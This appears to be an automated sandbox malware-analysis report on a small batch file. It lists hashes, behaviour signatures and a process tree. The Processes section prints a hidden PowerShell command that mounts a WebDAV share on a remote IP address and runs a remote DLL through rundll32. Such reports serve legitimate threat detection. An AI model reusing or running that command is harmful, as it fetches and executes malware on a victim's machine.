Analysis
max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 15/07/2024, 06:41
Static task: static1

Behavioral task: behavioral1
Sample: 142041243181263946.bat
Resource: win7-20240708-en
7 signatures, 150 seconds

Behavioral task: behavioral2
Sample: 142041243181263946.bat
Resource: win10v2004-20240709-en
8 signatures, 150 seconds
General
Target: 142041243181263946.bat
Size: 2KB
MD5: 9b5c6d7503e4562515d897894b172d39
SHA1: dc66f83505d8fa548298757534652c911fbf33fd
SHA256: c61193c14a5c82ee55598e41949fa7fe5b8e5e1e666dad775989bea0c0623c55
SHA512: 8dd425efe1a01078ed8213760970a76231e9b9ed05254881bf3eeb5e95793fdc6b24889c6551e2666791607c3b1c8d0eddb938b30a8726e4dfc604e9a545f5d9
Score: 8/10
Malware Config
(none)

Signatures

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell and hides the display window.
  pid   Process
  1260  powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Runs net.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  1260  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description               pid   Process
  Token: SeDebugPrivilege   1260  powershell.exe

Suspicious use of SetWindowsHookEx (5 IoCs)
  pid   Process
  1228  wordpad.exe
  1228  wordpad.exe
  1228  wordpad.exe
  1228  wordpad.exe
  1228  wordpad.exe

Suspicious use of WriteProcessMemory (12 IoCs)
  description                           pid   Process         procid_target
  PID 1056 wrote to memory of 1228      1056  cmd.exe         29
  PID 1056 wrote to memory of 1228      1056  cmd.exe         29
  PID 1056 wrote to memory of 1228      1056  cmd.exe         29
  PID 1056 wrote to memory of 1260      1056  cmd.exe         30
  PID 1056 wrote to memory of 1260      1056  cmd.exe         30
  PID 1056 wrote to memory of 1260      1056  cmd.exe         30
  PID 1260 wrote to memory of 2352      1260  powershell.exe  32
  PID 1260 wrote to memory of 2352      1260  powershell.exe  32
  PID 1260 wrote to memory of 2352      1260  powershell.exe  32
  PID 1260 wrote to memory of 2600      1260  powershell.exe  33
  PID 1260 wrote to memory of 2600      1260  powershell.exe  33
  PID 1260 wrote to memory of 2600      1260  powershell.exe  33
Processes

C:\Windows\system32\cmd.exe (PID 1056)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\142041243181263946.bat"
  Signatures: Suspicious use of WriteProcessMemory

  C:\Program Files\Windows NT\Accessories\wordpad.exe (PID 1228)
    Command line: "C:\Program Files\Windows NT\Accessories\wordpad.exe"
    Signatures: Suspicious use of SetWindowsHookEx

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1260)
    Command line: powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\233.dll,entry
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe (PID 2352)
      Command line: "C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\

    C:\Windows\system32\rundll32.exe (PID 2600)
      Command line: "C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\233.dll entry